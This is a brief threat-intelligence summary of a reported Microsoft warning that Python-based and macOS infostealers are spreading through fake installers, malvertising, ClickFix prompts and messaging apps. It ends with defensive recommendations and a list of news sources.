Key Findings:

• Microsoft warns that info-stealing attacks are "rapidly expanding" beyond Windows to target Apple macOS environments.

• Attackers are leveraging cross-platform languages like Python and abusing trusted platforms to distribute infostealer malware at scale.

Background

• Since late 2025, Microsoft has observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix-style prompts and malicious DMG installers.

• These campaigns deploy macOS-specific infostealers like DigitStealer, MacSync, and Atomic macOS Stealer (AMOS) using fileless execution, native macOS utilities, and AppleScript automation.

• The attacks harvest credentials, session data, and secrets from web browsers, keychains, and developer environments.

Python-based Infostealers

• Python-based stealers are being leveraged by attackers to rapidly adapt, reuse code, and target heterogeneous environments with minimal overhead.

• Malware like PXA Stealer, linked to Vietnamese-speaking threat actors, can harvest login credentials, financial information, and browser data.

• Attackers have used phishing emails to distribute PXA Stealer, leveraging registry Run keys, scheduled tasks, and Telegram for persistence and command-and-control.

Abuse of Trusted Platforms

• Bad actors have been observed weaponizing popular messaging apps like WhatsApp to distribute malware like Eternidade Stealer and gain access to financial and cryptocurrency accounts.

• Fake PDF editors like Crystal PDF are also being distributed via malvertising and SEO poisoning to deploy Windows-based stealers that can steal cookies, session data, and credential caches.

Recommendations

• Educate users on social engineering attacks like malvertising redirect chains, fake installers, and ClickFix-style copy-paste prompts.

• Monitor for suspicious Terminal activity and access to the iCloud Keychain, and inspect network egress for POST requests to newly registered or suspicious domains.

• Strengthen defenses against Python and LOLBIN abuse, enable cloud-delivered protection and EDR in block mode, and apply attack surface reduction rules.

Sources

• https://thehackernews.com/2026/02/microsoft-warns-python-infostealers.html

• https://securityaffairs.com/187608/security/microsoft-info-stealing-malware-expands-from-windows-to-macos.html

• https://x.com/TheCyberSecHub/status/2018966095005356318

• https://medium.com/@costigermano/microsoft-warns-python-infostealers-are-expanding-to-macos-through-fake-ads-and-installers-eda30b224507

• https://www.thedailystar.net/tech-startup/news/infostealers-target-macos-fake-ads-and-installers-microsoft-says-4098001

• https://www.cypro.se/2026/02/04/microsoft-warns-python-infostealers-target-macos-via-fake-ads-and-installers/